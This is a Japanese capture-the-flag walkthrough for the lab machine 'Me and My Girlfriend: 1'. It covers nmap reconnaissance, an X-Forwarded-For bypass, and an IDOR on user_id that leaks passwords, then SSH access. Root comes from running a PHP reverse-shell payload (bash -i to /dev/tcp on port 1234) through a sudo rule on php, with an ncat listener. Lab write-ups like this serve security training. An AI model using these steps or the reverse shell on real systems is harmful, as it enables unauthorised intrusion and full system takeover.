Me and My Girlfriend: 1のwalkthrough
はじめに
これをやる
flagはニコ
$ipは環境にあわせて変える
調査
前と同じようにsudo netdiscover -r $ip
,nmap -A -p- -sV $ip
のコンボ
$ nmap -p- -A -sV 192.168.100.44 57 Starting Nmap 7.60 ( https://nmap.org ) at 2020-02-29 14:48 JST Nmap scan report for Host is up (0.00017s latency). Not shown: 65533 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 1024 57:e1:56:58:46:04:33:56:3d:c3:4b:a7:93:ee:23:16 (DSA) | 2048 3b:26:4d:e4:a0:3b:f8:75:d9:6e:15:55:82:8c:71:97 (RSA) | 256 8f:48:97:9b:55:11:5b:f1:6c:1d:b3:4a:bc:36:bd:b0 (ECDSA) |_ 256 d0:c3:02:a1:c4:c2:a8:ac:3b:84:ae:8f:e5:79:66:76 (EdDSA) 80/tcp open http Apache httpd 2.4.7 ((Ubuntu)) |_http-server-header: Apache/2.4.7 (Ubuntu) |_http-title: Site doesn't have a title (text/html). Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 8.81 seconds
とりあえずアクセスしてみる
ローカルからしか見れないようで、ヒントでx-forwarded-forと書かれているので、ヘッダにつけて送る
便利そうな下のアドオンを入れた
ページが現れた
login機能があったので、kuroto, kurotoでregisterした後にloginしてみた パラメータにuser_idがある。どう考えても怪しい。profileに行くとusernameとpasswordが表示される。
profile画面でuser_idを変えるとpasswordが見れる
user_idの1~5がいるようなので、sshで繋いでみるとaliceだけヒットした(後で問題文を見るとAliceとBobが重要人物っぽい)
/home/alice/.my_secret/flag1.txtが一つ目のflagだった
alice@gfriEND:~$ sudo -l Matching Defaults entries for alice on gfriEND: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User alice may run the following commands on gfriEND: (root) NOPASSWD: /usr/bin/php
rootになれるっぽい
リバースシェルを実行させて終わり
$ cat shell.php <?php exec("/bin/bash -c 'bash -i >& /dev/tcp/$ip/1234 0>&1'"); ?>
$ sudo -u root /usr/bin/php shell.php
$ ncat -lvp 1234 root@gfriEND:~# cd /root root@gfriEND:/root# ls flag2.txt root@gfriEND:/root#
flag2.txtをcatして終わり
感想
前のに比べて簡単だった
bobでて来なかった
次はこれ